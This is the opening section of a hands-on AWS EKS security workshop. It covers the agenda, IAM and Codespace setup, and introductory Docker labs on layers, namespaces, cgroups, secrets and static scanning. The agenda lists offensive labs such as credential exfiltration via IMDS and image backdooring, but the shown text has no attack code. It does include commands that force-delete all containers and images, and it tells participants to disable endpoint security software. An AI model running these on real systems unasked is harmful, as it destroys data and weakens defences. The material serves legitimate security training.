Welcome to AWS EKS Security Masterclass

Logo

Welcome to EKS Goat: AWS EKS Security Masterclass, a comprehensive and hands-on workshop designed to elevate your understanding of AWS Elastic Kubernetes Service (EKS) security. This immersive course is tailored for security professionals and enthusiasts who seek to gain deep insights into securing containerized environments and EKS clusters on AWS.

Workshop Website

Access the EKS Security workshop content here:
https://ekssecurity.kubernetesvillage.com

Alternate Link

In case of accessibility issues, you can use the following link:
https://ekssecurity.netlify.app/

Authored by Anjali & Divyanshu

Workshop Overview

The EKS Goat: AWS EKS Security Masterclass is an immersive security workshop designed to take participants through real-world scenarios of attacking and defending Kubernetes clusters hosted on AWS EKS.

This workshop provides a comprehensive approach, from understanding the anatomy of attacks on EKS clusters to deploying robust defense mechanisms. Participants will learn how to exploit misconfigurations and vulnerabilities within AWS EKS, followed by the implementation of best security practices to safeguard the environment.

Key Takeaways:

  • Hands-on labs focused on exploiting EKS misconfigurations.
  • Techniques for lateral movement, privilege escalation, and post-exploitation in AWS EKS.
  • Deep dive into securing AWS EKS clusters by leveraging IAM roles, Kubernetes RBAC, and network policies.
  • Best practices for automating vulnerability detection and defense mechanisms in AWS EKS environments.

This workshop is tailored for security professionals, cloud engineers, and DevOps teams looking to enhance their understanding of offensive and defensive Kubernetes security strategies.

About Us:

  • Anjali is a senior cloud security engineer & founder of Kubernetes Village. She has over 5 years of experience in cloud security ( GCP, AWS & Azure )and DevSecOps (CI/CD), Kubernetes (EKS & GKE), and IAC security. She was a member of the Infosec Girls mentorship program and regularly publishes research on various cloud security via youtube channel @peachycloudsecurity. She was a volunteer at Defcon Cloud Village and currently leads the Bangalore chapter for W3-CS. Additionally, she is an AWS Community Builder. She has delivered training and talks at conferences like Blackhat Spring’24, Blackhat Europe’23, Bsides Bangalore 2023/2024, CSA Bangalore Annual Summit, C0c0n 2023, Null Community Meetup Bangalore, Google Cloud IAP Security at the Cloud Security Podcast, and Nullcon 2023.

  • Divyanshu is a senior security engineer with more than 7 years of experience in Security architecture reviews of Cloud, Web & Cloud Pentesting, DevSecops, Automation, and Secure Code Review. He has reported multiple vulnerabilities to companies like Airbnb, Google, Microsoft, AWS, Apple, Amazon, Samsung, Zomato, Xiaomi, Alibaba, Opera, Protonmail, Mobikwik, etc, and received CVE-2019-8727 CVE-2019-16918, CVE-2019-12278, CVE-2019-14962 for reporting issues. Author Burp-o-mation and a very-vulnerable-serverless application. Also part of AWS Community Builder for security and was a Defcon Cloud Village crew member 2020/2021/2022. He has also given training and talks in events like Nullcon Hyderabad'24, Brucon'24, Blackchat Europe Arsenal'23, C0c0n'24, Nullcon Goa'24, Bsides Bangalore'23, Parsec IIT Dharwad and Null community. Awarded title of Cloudsecurity Champion CSA Bangalore'23 & Cybersecurity Samurai at the Bsides Bangalore'23.

Contact Us

Excited About the Class:

🚨🚨

⚠️ IMPORTANT NOTICE: Please use a new or dedicated AWS account for these operations. Some commands may delete data or resources within the AWS environment. The author assumes no responsibility for any data loss or unintended consequences resulting from the use of these commands.

⭐⭐⭐⭐⭐

Introduction

As organizations increasingly adopt microservices and distributed architectures, ensuring the security of Kubernetes environments becomes critical. This course introduces participants to the essential concepts of container and Kubernetes security, with a focus on AWS EKS. You will learn about common vulnerabilities, tools, and techniques for attacking and securing applications within EKS clusters. The course will also guide you through security audits, leveraging industry best practices, tools, and custom scripts to evaluate and enhance the security posture of your Kubernetes deployments.

Throughout the course, real-world examples from penetration testing engagements will be shared, bridging the gap between theoretical knowledge and practical application. By the end of this training, you will be well-equipped to identify, exploit, and secure applications running in AWS EKS clusters.

Prerequisite (Mandatory)

  • GitHub Codespace Setup: Use GitHub Codespace to set credentials and deploy infrastructure for learning.
  • Bring Your Own AWS Account: Participants must bring their own AWS account with billing enabled and admin privileges.
  • Bring Your Laptop: Ensure you have your laptop ready for hands-on activities.

Takeaways

  • In-depth Hands-on Training: Led by experienced professionals in AWS & EKS Security.
  • Extended Lab Access: Enjoy access to course content after the class to reinforce your learning.
  • Real World Scenario: Test your skills with a real-world vulnerable scenario leading to AWS EKS exploitation.
  • Comprehensive Course Materials: Receive a training presentation covering all the content discussed during the course.

Disclaimer

  • The information, commands, and demonstrations presented in this course, AWS EKS Red Team Masterclass - From Exploitation to Defense, are intended strictly for educational purposes. Under no circumstances should they be used to compromise or attack any system outside the boundaries of this educational session unless explicit permission has been granted.

    • This course is provided by the instructors independently and is not endorsed by their employers or any other corporate entity. The content does not necessarily reflect the views or policies of any company or professional organization associated with the instructors.
  • Usage of Training Material: The training material is provided without warranties or guarantees. Participants are responsible for applying the techniques or methods discussed during the training. The trainers and their respective employers or affiliated companies are not liable for any misuse or misapplication of the information provided.

  • Liability: The trainers, their employers, and any affiliated companies are not responsible for any direct, indirect, incidental, or consequential damages arising from the use of the information provided in this course. No responsibility is assumed for any injury or damage to persons, property, or systems as a result of using or operating any methods, products, instructions, or ideas discussed during the training.

  • Intellectual Property: This course and all accompanying materials, including slides, worksheets, and documentation, are the intellectual property of the trainers. They are shared under the Apache License 2.0, which requires that appropriate credit be given to the trainers whenever the materials are used, modified, or redistributed.

  • References: Some of the labs referenced in this workshop are based on open-source materials available at Amazon EKS Security Immersion Day GitHub repository, licensed under the MIT License. Additionally, modifications and fixes have been applied using AI tools such as Amazon Q, ChatGPT, and Gemini.

  • Educational Purpose: This lab is for educational purposes only. Do not attack or test any website or network without proper authorization. The trainers are not liable or responsible for any misuse.

  • Usage Rights: Individuals are permitted to use this course for instructional purposes, provided that no fees are charged to the students.

Credits

Reach out in case of missing credits.

❗❗ ⚠️ IMPORTANT NOTICE: Please use a new or dedicated AWS account for these operations. Some commands may delete data or resources within the AWS environment. The author assumes no responsibility for any data loss or unintended consequences resulting from the use of these commands. ❗❗

⭐⭐⭐⭐⭐

Agenda

Workshop Overview

This workshop provides participants with a deep dive into securing and defending AWS EKS. The session begins with a foundational understanding of Kubernetes and AWS EKS terminologies, followed by hands-on labs simulating real-world attack scenarios and defense strategies. Participants will learn how to exploit vulnerabilities within an EKS cluster and how to mitigate these threats effectively.

The workshop is designed to cover both offensive techniques (exploiting vulnerabilities) and defensive strategies (hardening and monitoring). By the end of the session, participants will gain practical experience in safeguarding applications running in AWS EKS environments.

Key Components

Container Security Overview

  • Introduction to Docker
    • Lab: Understanding Docker Images and Layers
    • Docker Namespaces and Control Groups (CGroups)
    • Lab: Docker Secrets
  • Static Analysis of Docker Containers (SAST)
    • Lab: Using Dockle and Hadolint
    • Lab: Audits with AquaSecurity Docker Bench Security

AWS Elastic Container Registry (ECR) Overview

  • Lab: AWS ECR Image Scanning
  • Lab: AWS ECR Immutable Image Tag

AWS EKS Fundamentals

  • Lab: Deploying a Vulnerable AWS EKS Infra
    • Kubernetes Architecture
    • AWS EKS Terminologies
    • EKS Authentication & Authorisation
  • Lab: Exploiting the Sample Application
    • Lab: Enumerate & Exploit Web Application for Vulnerability
    • Lab: Using IMDSv2 to Exfiltrate Credentials
    • Lab: Enumerate ECR Repositories Using Credentials
    • Lab: Backdooring a Docker Image
    • Lab: Exploiting AWS EKS Cluster
    • Lab: Breaking Out from Pod to Node
    • Lab: Privilege Escalation & S3 Exploitation
    • Lab: Cleanup EC2 Instance

Automated Scanning in EKS

  • Lab: Scanning Using Kubescape
  • Lab: Scanning Using Kubebench

Defense & Hardening in EKS

  • Lab: Pod Security Context
  • Lab: Using CEL for Policy Enforcement via Kyverno
  • Lab: AWS GuardDuty for Threat Detection
  • Lab: Runtime Security with eBPF Tetragon
  • Lab: Destroy EKS Vulnerable Infra

Hands-On Labs

Participants will engage in the following hands-on labs:

  • Exploiting Sample Applications: Simulating real-world attacks by identifying and exploiting web application vulnerabilities within the EKS environment.
  • Using IMDSv2: Extract AWS credentials via metadata service vulnerabilities.
  • Backdooring Docker Images: Injecting malicious code into Docker images and deploying it within EKS.
  • EKS Cluster Exploitation: Identify and exploit misconfigurations in the EKS environment.
  • Pod to Node Breakout: Gaining unauthorized access to the underlying node from a compromised pod.
  • Privilege Escalation and S3 Exploitation: Escalating privileges and compromising sensitive data stored in S3.

Learning Objectives

  • Gain a deep understanding of AWS EKS security concepts.
  • Learn how to exploit vulnerabilities and misconfigurations in AWS EKS clusters.

Outline

  • Lab Environment Setup:

    • Lab: Setup AWS IAM User
    • Lab: Setup GitHub Codespace
    • Lab: Deploying a Vulnerable AWS EKS Infra
  • Introduction to AWS EKS:

    • Theory: Kubernetes Architecture Overview
    • Theory: AWS EKS Terminologies
    • Theory: EKS Authentication & Authorization
  • Lab: Exploiting the Sample Application:

    • Lab: Enumerating & Exploiting a Web Application Vulnerability
    • Lab: Using IMDSv2 to Exfiltrate Credentials
    • Lab: Exploiting ECR by Backdooring a Docker Image
    • Lab: Exploiting AWS EKS Cluster
    • Lab: Breaking Out from Pod to Node
    • Lab: Privilege Escalation & S3 exploitation for flag

⭐⭐⭐⭐⭐

Prerequisites

  • GitHub Codespace Setup (Mandatory): Set up GitHub Codespace to deploy the required infrastructure for hands-on labs.
  • New AWS Account (Mandatory): Bring own New AWS Account with billing enabled and administrative privileges.
    • Please use a new or dedicated AWS account for these operations. Some commands may delete data or resources within the AWS environment.
  • Laptop (Mandatory): Bring a laptop with an updated OS and stable internet connection for lab exercises.
  • Browser (Mandatory): Browser like Firefox & Chrome installed
  • Basic Knowledge: Familiarity with Kubernetes and AWS services is recommended.
  • Administrator Access: Ensure administrator access on the laptop to disable security solution which hinders the lab access via browser.
  • VPN Disabled: Disable any VPNs to avoid connectivity issues while accessing codespace endpoint.
  • Security Software: Permission to disable security solutions during lab if it blocks access to external applications.

Lab Access (Only for Public Workshops):

alt text

Revision:

  • Updated Audits with Docker Bench Security

❗❗ ⚠️ IMPORTANT NOTICE: Please use a new or dedicated AWS account for these operations. Some commands may delete data or resources within the AWS environment. The author assumes no responsibility for any data loss or unintended consequences resulting from the use of these commands. ❗❗

⭐⭐⭐⭐⭐

AWS EKS Basics

alt text

In this section, learners will use the practical approach to get started with AWS EKS with emphasis on containers, basic EKS components and security testing. Here, the lab-based approach will give strong foundation to the novice to containers & EKS using which they are able to learn the theory and application of securing and deploying and managing applications in containers in AWS.

Preparing the Environment for Lab Setup

alt text

This guide covers the following steps:

  • Setting up an IAM User in AWS
  • Configuring Admin credentials for the IAM User
  • Setting up the GitHub repository and GitHub Codespace for the lab
  • Instructions to deploy an mdbook
  • Steps to deploy a vulnerable EKS cluster for the lab scenarios
  • Comprehensive guide to learn and perform the entire lab scenario for AWS EKS security.

Lab: Setup AWS IAM User for Lab

alt text

Step-by-Step Guide to Set Up an IAM User with Admin Credentials for mdbook using AWS Console

Skip this step if the admin user is already set up and the access keys are readily available for the lab.

  1. Log in to AWS Management Console

    • Go to AWS Console.
    • Log in using your root or IAM account with administrative privileges.

    alt text

    Disclaimer: Use of the root account is only for setting up the admin user. If an administrative user already exists, this step can be skipped. Avoid using the root account for regular operations.

  2. Navigate to IAM

    • In the AWS console, search for IAM (Identity and Access Management) and click on it.

    alt text

  3. Create a New IAM User

    • In the IAM Dashboard, click on Users from the left panel, then click Add user.

    • Enter a User name (e.g., admin).

      • Also select Provide user access to the AWS Mangement Console.

      • Enter custom password.

  4. Set User Permissions

    • Under Select AWS access type, check the box for Programmatic access.
    • For Set permissions, select Attach policies directly and then search for AdministratorAccess.
    • Check the AdministratorAccess policy to grant full admin privileges.

    alt text

  5. Review and Create

    • Review the user details and click Create user.

    alt text

  6. Download Access Keys

    • Once the user is created, you will see Access key ID and Secret access key. Download these credentials by clicking Download .csv file or copy them for later use. These credentials will be needed to configure the mdbook.

    alt text

    If Admin is user is already setup, follow next steps to create access keys for the admin user.

  7. Setup IAM Access Keys for Admin User

    • Go to AWS Console & then log in using your admin user which is setup for this lab.

    This can be a separate user, used only for the AWS EKS security lab.

  8. Navigate to IAM

    • In the AWS console, search for IAM (Identity and Access Management) and click on it.
    • In the IAM Dashboard, click on Users from the left panel, then enter a User name (e.g., admin (this can be the admin user for lab)).

    alt text

    • Then click on Security Credentials tab, by scrolling down.

    alt text

    • On the Access Keys tab, click on Create Key, then select the usecase as Command Line Interface (CLI), tick the Confirmation and finally click on Next.

    alt text

    • Fill the description (optional) & click on Create access key.

    alt text

  9. Configure IAM User in GitHub Codespace

    • Use the Access key ID and Secret access key to configure access in your GitHub Codespace for deployment purposes.

Notes:

  • Ensure to store the access keys securely. They will be used to interact with AWS services programmatically, including setting up and deploying resources for the mdbook.

Refer to this video for detailed walkthrough


Setup Github Codespace for Deployment

alt text

Step-by-Step Guide to Set Up GitHub Codespace from Browser

  • Log in to GitHub

  • Fork the Repository

    alt text

    Disclaimer: The labs and repository used in this setup may vary depending on the session. Different environments and configurations are used for various sessions. Always ensure you're working with the correct repository and instructions for your specific session..

    • In the top-right corner, click the Fork button to create a copy of the repository in your GitHub account.

    alt text

  • Open the Forked Repository in Codespace

    • Go to your forked version of the repository in your GitHub account.

    alt text

    • Click the Code button, then select the Codespaces tab.

    • Choose New Codespace or Create Codespace on main (or any branch you're working on).

    alt text

  • Wait for Initialization

    • The Codespace will initialize, setting up a virtual development environment.

    alt text

    • Once ready, you will be directed to a VSCode-like environment where you can develop and test your project.

    alt text

  • Configure Your Environment

    • Ensure all necessary dependencies for the project are installed by following the repository’s setup instructions.
    • Follow Post Codespace Setup: Terminal Commands mentioned below.
      • Once the Codespace setup is complete, perform the following steps from the terminal:

        1. Navigate to the project directory
          Run the command:
        ls
        cd eks/
        

        alt text

        1. Make the pre-deployment script executable
          Use the following command:
        chmod +x pre-deploy.sh
        

        alt text

        1. Run the pre-deployment script
          Execute the pre-deployment script to prepare the environment:
        source pre-deploy.sh
        

        alt text

        These steps will help you prepare the environment and deploy your project as part of the lab setup. This will take upto 10 minutes.

Patience is virtue !

  • Setup AWS Credentials

    • Copy the credentials from AWS Console.

    In case there is a csv fro credentials which was downloaded, copy the credentials from the csv. This credentials file must be securely stored.

    • Use the terminal in Codespace to setup aws cli.
    aws configure
    

    alt text

    Enter the access key, secret key, region & output format.

    • Validate the credentials via aws sts get-caller-identity.
    aws sts get-caller-identity
    

    alt text

Refer to this video for detailed walkthrough


  • Next step is to deploy the vulnerable scenario for the learning, proceed to next lesson.

Introduction to Docker

What is Docker?

  • Docker is a tool that helps you package and run applications in a special environment called a container.
  • Think of a container as a box that holds everything your application needs to run—code, libraries, and settings—so it works the same everywhere.

Why Use Docker?

  • Consistency: Ensures your application works the same on all machines.
  • Simplifies Deployment: Makes it easy to share and deploy applications.
  • Resource Efficiency: Uses less system resources compared to virtual machines.
  • Scalability: Easily scale up or down by running more or fewer containers.

Containers vs. Virtual Machines

Containers:

  • Lightweight: Share the host system's operating system.
  • Fast Startup: Launch in seconds.
  • Resource-Efficient: Use less memory and storage.

Virtual Machines:

  • Heavyweight: Include a full guest operating system.
  • Slower Startup: Take minutes to boot.
  • Isolated: Better security due to complete separation.

Advantages and Disadvantages of Docker

Advantages:

  • Solves Dependency Issues: Packages all dependencies with the app.
  • Cross-Platform: Runs on Windows, macOS, and Linux.
  • Scalable: Easily handle increased load by adding more containers.
  • Efficient Resource Use: No need for extra OS overhead.

Disadvantages:

  • Limited GUI Support: Not ideal for applications with graphical interfaces.
  • Windows Support: Not as robust as Linux support.
  • Security Concerns: Less isolated than virtual machines.
  • Requires Host OS: Can't run directly on hardware without an OS.

Docker Architecture

  • Docker uses a client-server architecture:

Components:

  • Docker Client (CLI): The command-line tool you use to interact with Docker.
  • Docker Daemon (Server): Runs in the background and does the heavy lifting (building, running, and distributing containers).
  • Docker Registry: Stores Docker images (e.g., Docker Hub).

Getting Started with Docker

  • Install Docker

    • Windows/macOS: Download from Docker's official website.
    • Linux: Use your package manager (e.g., sudo apt install docker.io for Ubuntu).
  • Verify Installation

docker --version
  • Run Your First Container
docker run hello-world
  • Understand Docker Images and Containers

  • Image: A snapshot of an application and its environment.

  • Container: A running instance of an image.

  • Pull an Image from Docker Hub

docker pull python:3.8-slim

Step 6: Run a Container Interactively

docker run -itd python:3.8-slim bash

Step 7: Exit the Container

  • Type exit or press Ctrl+D to exit the container.

Step 8: List Running Containers

docker ps

Step 9: Stop and Remove Containers

  • Stop a Container:
docker stop $(docker ps -q --filter "ancestor=python:3.8-slim")
  • Remove a Container:
docker rm $(docker ps -a -q --filter "ancestor=python:3.8-slim")

Step 10: Remove Images

docker rmi python:3.8-slim

Conclusion

  • Docker simplifies the process of developing, shipping, and running applications by using containers. It's a valuable tool for both developers and system administrators, making applications more portable and efficient.

Additional Resources

Container Security

What is Container Security?

Container security is about protecting applications running inside containers and their infrastructure from risks like vulnerabilities, misconfigurations, or attacks. It ensures that containers and the systems hosting them are secure from potential threats.

Unlike traditional applications, containers operate differently, requiring tailored security approaches:

  • Complex Architecture: Containers often host microservices, which are smaller, interconnected components, making the system more complex than traditional monolithic applications.
  • Cluster Deployment: Containers are usually deployed across multiple servers, unlike single-server applications.
  • Additional Layers: Container environments include tools like orchestrators and runtimes, adding more security layers.
  • Different Processes: Containers often follow immutable infrastructure principles, meaning they are replaced rather than updated, which changes how security is managed.

Key Areas of Container Security

To fully secure containerized applications, there is need to protect several components:

  1. Container Images:

    • These are the blueprints for creating containers. Vulnerabilities in images could allow attackers to exploit them.
    • Regularly scan images for risks and avoid using untrusted sources.
  2. Container Repositories:

    • These host container images. A breach here could result in malicious images being distributed.
    • Secure repositories with strong access controls and scanning tools.
  3. Container Runtimes:

    • These convert images into running containers. Vulnerabilities in runtimes could lead to unauthorized access or control.
    • Use updated and secure container runtimes.
  4. Container Hosts:

    • The physical or virtual machines running containers. Weak server configurations or outdated systems can expose containers to risks.
    • Keep host systems patched and use minimal configurations.
  5. Orchestrators:

    • Tools like Kubernetes that manage containers across servers. Misconfigurations or weak access controls here can expose entire container clusters.
    • Secure orchestrators with proper role-based access controls (RBAC).

Challenges in Container Security

Containerized applications face unique threats:

  1. Large Attack Surface:

    • Organizations may deploy thousands of containers. A flaw in any one container can lead to a breach.
  2. Rapid Changes:

    • Containers are frequently updated or replaced, sometimes daily. This rapid pace increases the likelihood of security gaps.
  3. Third-Party Risks:

    • Containers often rely on images or libraries from open-source sources. If these resources are insecure, they can introduce vulnerabilities.

Best Practices for Container Security

  1. Image Security:

    • Use trusted sources and regularly scan images for vulnerabilities.
    • Avoid unnecessary libraries or tools in images to reduce risk.
  2. Secure Configurations:

    • Follow security best practices for hosts, orchestrators, and runtimes.
    • Limit container privileges (e.g., avoid running containers as root).
  3. Monitor and Update:

    • Continuously monitor container activity for unusual behavior.
    • Keep all tools, images, and host systems updated.
  4. Supply Chain Security:

    • Verify the integrity of third-party libraries and dependencies.
    • Use tools to manage and monitor the software supply chain.

Lab: Understanding Docker Images and Layers

container

Image Credit: https://www.linkedin.com/pulse/understanding-docker-layers-efficient-image-building-majid-sheikh/

Objectives

  • Understand what Docker images and layers are
  • Learn how to create and inspect Docker images using Dockerfile
  • Explore the concept of layers using Docker commands

Key Concepts

What is a Docker Image?

  • A Docker image is a blueprint/template used to create Docker containers
  • It is static and stored as layers
  • Think of it like a recipe: the instructions (layers) define how the image works

What is a Docker Layer?

  • A layer is a set of instructions in the Dockerfile
  • Each command in a Dockerfile adds a layer to the image
  • Layers make Docker images efficient by reusing unchanged layers

container

Image Credit: https://www.linkedin.com/pulse/understanding-docker-layers-efficient-image-building-majid-sheikh/

Hands on Lab

Create a Docker image for running curl

  • Create a new folder for the project:

    cd /workspaces/ecr_eks_security_masterclass_public/
    mkdir docker-lab && cd /workspaces/ecr_eks_security_masterclass_public/docker-lab
    
  • Create a Dockerfile:

    cat << EOF > Dockerfile
    # Start with a minimal Alpine Linux image
    FROM alpine:latest
    
    # Install curl
    RUN apk update && apk add curl
    
    # Set default command
    CMD ["curl", "--help"]
    EOF
    
  • Build the Docker image with a tag:

    docker build -t mycurl .
    
  • Verify the image is created:

    docker images
    

Inspect Layers in the Docker Image

  • Check the layers of your image:

    docker history mycurl
    
  • Notice how each instruction in the Dockerfile corresponds to a layer

  • Run the container using the image:

    docker run mycurl
    

Modify and Rebuild the Dockerfile

  • Change the default command to print the version of curl

  • Open the Dockerfile:

    cat << EOF > Dockerfile
    # Start with a minimal Alpine Linux image
    FROM alpine:latest
    
    # Install curl
    RUN apk update && apk add curl
    
    # Set default command
    CMD ["curl", "--version"]
    EOF
    
  • Rebuild the image:

    docker build -t mycurl .
    

Reuse Layers for Efficiency

  • Check the image build logs:

    docker build -t mycurl .
    
  • Observe which steps were reused.

  • Run the curl command via docker.

    docker run mycurl
    

Explore Image Layers with Dive Tool (Optional)

  • Install Dive:

    wget https://github.com/wagoodman/dive/releases/download/v0.12.0/dive_0.12.0_linux_amd64.deb
    sudo apt install ./dive_0.12.0_linux_amd64.deb
    
  • Analyze the image:

    dive mycurl
    
  • Explore the layers and their sizes.

  • Use inspect to retrieve metadata and configuration details about the mycurl image.

     docker inspect mycurl
    

Push the Image to Docker Hub (Optional)

  • Log in to docker Hub.

You will be prompted to enter your Docker Hub username and password.

docker login
  • Tag the image:

    docker tag mycurl <your-dockerhub-username>/mycurl:1.0
    
  • Push the image:

    docker push <your-dockerhub-username>/mycurl:1.0
    

Summary

  • Docker images consist of layers, with each layer representing a command in the Dockerfile
  • Layers enable efficiency by caching unchanged parts of the image
  • Tools like Dive help visualize layers for better understanding

Tasks

  • Modify the Dockerfile to install and run a different tool (e.g., htop)
  • Inspect and explore the layers of your new image using docker history and dive

Lab: Docker Namespaces and Control Groups (Cgroups)

ns&gcroup

Image Credit: https://medium.com/@mrdevsecops/namespace-vs-cgroup-60c832c6b8c8

What Are Namespaces?

  • Definition: Namespaces are a feature in the Linux kernel that isolate various aspects of system resources. They ensure that processes in one namespace are independent and invisible to processes in another.
  • Purpose: To provide isolation, creating a self-contained environment for processes, which is a core part of containerization.

Real-World Example:

Imagine a hotel with multiple rooms. Each room is isolated with its own keys, furniture, and guests. Guests in one room cannot directly interact with another room. Similarly, namespaces isolate processes within their "container rooms."

Types of Namespaces:

  1. PID Namespace (Process IDs):

    • Isolates process IDs.
    • Each container has its own process numbering, starting from PID 1.
    • Example: A container's process may appear as PID 1 inside the container but could be PID 1000 on the host.
  2. Network Namespace:

    • Provides isolated networking for containers.
    • Each container can have its own virtual network interface, IP address, and routing.
    • Example: A container might have a private IP (e.g., 192.168.1.10) while the host uses 10.0.0.1.
  3. Mount Namespace:

    • Controls file system access and isolation.
    • Containers can have specific mount points without seeing or affecting the host's mounts.
    • Example: A container may only access /app without visibility into /home on the host.
  4. User Namespace:

    • Separates user IDs and group IDs between host and container.
    • A user can appear as root (UID 0) inside a container but remain a regular user on the host.
    • Example: Running a containerized app as root inside the container without elevated privileges on the host.

What Are Control Groups (Cgroups)?

Image

Image Credit: https://medium.com/@mrdevsecops/namespace-vs-cgroup-60c832c6b8c8

  • Definition: Cgroups are another Linux kernel feature that manages resource allocation and limits for processes.
  • Purpose: To prevent one container from monopolizing system resources (like CPU, memory, or disk I/O).

Real-World Example:

Think of a shared gym in an apartment complex. Each apartment (container) gets a fixed time slot (CPU) and limited equipment usage (memory). This prevents one tenant from hogging all the resources.

Key Cgroup Features:

  1. Memory Limiting:

    • Sets a maximum memory a container can use.
    • Example: A container limited to 512MB of RAM cannot use more, even if the host has more memory.
  2. CPU Throttling:

    • Restricts CPU usage for a container.
    • Example: A container assigned 50% of CPU will use only half of a core.
  3. Process Limits:

    • Controls the number of processes a container can run.
    • Example: A container allowed to spawn only 10 processes cannot create the 11th process.

Why Are Namespaces and Cgroups Important?

  • Isolation: Namespaces ensure processes and resources are kept separate, mimicking virtual environments.
  • Resource Control: Cgroups ensure fair allocation of system resources, avoiding scenarios where one container affects others.

Hands on Lab

Explore Namespaces

  • Open a terminal and list namespaces for the current process:

    ls -l /proc/self/ns
    
  • Observe the types of namespaces available.

  • Start a basic container:

    docker run --rm -it alpine sh
    
  • Inside the container, check process IDs:

    ps -ef
    
  • Get and list the namespaces of a container's main process:

  • Now, execute the following script to inspect the namespaces of running containers:

    docker ps -q | while read container_id; do
        pid=$(docker inspect -f '{{.State.Pid}}' "$container_id")
        if [ -d "/proc/$pid/ns" ]; then
            ls -l "/proc/$pid/ns"
        else
            echo "Namespace for PID $pid not found"
        fi
    done
    
  • Observe how the namespace IDs differ between the host and the container, ensuring isolation.

Share Namespaces Between Host and Container

  • Run a container sharing the host's process namespace:
    docker run --rm -it --pid=host alpine sh
    
  • Inside the container, list processes:
    ps aux
    
  • Notice how the processes from the host are visible inside the container.

Explore Cgroups

  • Run a container with a process limit.

    docker run --rm --pids-limit 2 alpine sh -c "while true; do sleep 1 & done"
    

Observe how the container prevents you from creating more processes.

  • Run a container with memory and CPU limits:

    docker run --rm --memory=256m --cpus="0.5" alpine sh -c "yes > /dev/null"
    
  • Open another terminal and monitor the resource usage:

    docker stats
    

Observe how resource usage is constrained within the defined limits.

Summary

  • Namespaces provide isolation, allowing each container to operate as if it has its own environment.
  • Cgroups manage resources, ensuring containers don't exhaust system resources.
  • These features are essential to Docker's lightweight virtualization.

Additional Reference:

  • https://medium.com/@mrdevsecops/namespace-vs-cgroup-60c832c6b8c8

Lab: Docker Secrets

What Are Docker Secrets?

  • Docker secrets securely store sensitive information like passwords, API keys, or certificates.
  • They allow secure access to secrets in running containers without hardcoding sensitive data into the container or its configuration.

Hands on Lab

  • Change the directory to working directory.

    cd /workspaces/ecr_eks_security_masterclass_public/docker-lab
    
  • Docker Swarm mode must be initialized. Run the following to initialize if not already done.

    docker swarm init
    
  • Create a file with a secret value.

    echo "mySuperSecretPassword123" > secret.txt
    
    • This file contains the secret that will be securely stored in Docker.
  • Add this file as a Docker secret.

    docker secret create my_secret secret.txt
    
    • Replace my_secret with your chosen name for the secret.
    • You should see a confirmation message showing the secret’s ID.
  • List all secrets in your Docker Swarm to verify.

    docker secret ls
    

Note that the secret content is not visible, ensuring secure handling.

  • Create a service that uses the secret.
    docker service create --name secret_service --secret my_secret alpine sleep 300
    

This command creates a service called secret_service that uses the my_secret secret.

The container runs alpine and sleeps for 300 seconds, giving time to inspect it.

  • Verify the service is running.

    docker service ls
    
  • Get the container ID of the service.

    docker ps -q --filter "name=secret_service"
    
  • Enter the container’s shell.

    docker exec -it $(docker ps -q --filter "name=secret_service") cat /run/secrets/my_secret
    

The secret content should be displayed securely inside the container.

Clanup

  • Remove the service

    docker service rm secret_service
    
  • Remove the secret.

    docker secret rm my_secret
    
  • Delete the temporary secret file from your system:

    rm secret.txt
    

Static Analysis of Docker Containers (SAST)

What is Static Analysis (SAST) for Docker Containers?

  • Static Analysis Security Testing (SAST) inspects container images for vulnerabilities and misconfigurations.
  • It analyzes the container's code, configurations, and dependencies without running the container.

What Does SAST Analyze in Docker Containers?

  • Dockerfile: Checks for insecure instructions like using latest tags or running as root.
  • Base Images: Scans the operating system and libraries in the base image for vulnerabilities.
  • Dependencies: Analyzes libraries and tools installed inside the container for outdated or insecure versions.
  • Exposed Ports: Identifies unnecessarily exposed ports that could widen the attack surface.
  • Secrets and Sensitive Data: Detects hardcoded secrets like API keys or passwords inside container layers.

Common Tools for SAST in Docker Containers

  • Trivy: Open-source tool that scans container images for vulnerabilities.
  • Docker Scan: Built-in Docker CLI tool powered by Snyk for security analysis.
  • Anchore: Comprehensive container scanning platform.
  • Clair: Static vulnerability analysis tool for container images.

Benefits of SAST for Docker Containers

  • Identifies vulnerabilities before deployment, reducing risks in production.
  • Ensures compliance with security standards and best practices.
  • Saves time and effort by catching issues early in the development lifecycle.

Hands-On Lab: Docker Static Analysis with Dockle and Hadolint

Hands on Lab

Dockle: Setup, Usage, and Cleanup

  • Change the directory.

    cd /workspaces/ecr_eks_security_masterclass_public/docker-lab
    
  • Download and install the latest version of Dockle on Debian/Ubuntu:

    VERSION=$(curl --silent "https://api.github.com/repos/goodwithtech/dockle/releases/latest" | grep '"tag_name":' | sed -E 's/.*"v([^"]+)".*/\1/' ) && curl -L -o dockle.deb https://github.com/goodwithtech/dockle/releases/download/v${VERSION}/dockle_${VERSION}_Linux-64bit.deb
    
    sudo dpkg -i dockle.deb && rm dockle.deb
    
  • Pull a sample Docker image:

    docker pull nginx:latest
    
  • Run Dockle on the pulled Docker image:

    dockle nginx:latest
    

Review the report for vulnerabilities and misconfigurations.

Hadolint: Setup, Usage, and Cleanup

  • Install Hadolint as a Docker container:

    docker pull hadolint/hadolint
    
  • Create a sample Dockerfile:

    cat <<EOF > Dockerfile
    FROM nginx:latest
    RUN apt-get update && apt-get install -y curl
    CMD ["nginx", "-g", "daemon off;"]
    EOF
    
  • Run Hadolint on the Dockerfile.

    docker run --rm -i hadolint/hadolint < Dockerfile
    
  • Ignore specific linting rules.

    cat Dockerfile | docker run --rm -i hadolint/hadolint hadolint --ignore DL3008 -
    

Cleanup Dockle

  • Remove the Docker image:

    docker rmi nginx:latest
    
  • Uninstall Dockle if not needed:

    sudo apt remove dockle
    

Cleanup Hadolint

  • Remove the Dockerfile:

    rm Dockerfile
    
  • Remove the Hadolint Docker image:

    docker rmi hadolint/hadolint
    

Hands-On Lab: Docker Security Checks with Docker Bench Security

Prerequisites

  • Docker installed on your system.
  • git installed for cloning repositories.

Hands-On Lab

Setup Docker Bench Security

  • Change to your desired working directory:

    cd /workspaces/ecr_eks_security_masterclass_public/docker-lab
    
  • Clone the Docker Bench Security repository:

    git clone https://github.com/docker/docker-bench-security.git
    
  • Navigate into the cloned repository:

    cd docker-bench-security
    
  • Make the main script executable:

    chmod +x docker-bench-security.sh
    
  • Run the script to analyze your Docker environment:

    sudo ./docker-bench-security.sh
    

Review the output.

Cleanup Docker Bench Security

  • Remove the cloned repository:
    cd ..
    rm -rf docker-bench-security
    

Cleanup the running containers & images.

  • Remove all running and stopped containers.

    docker rm -f $(docker ps -aq)
    
  • Remove all images.

    docker rmi -f $(docker images -aq)
    

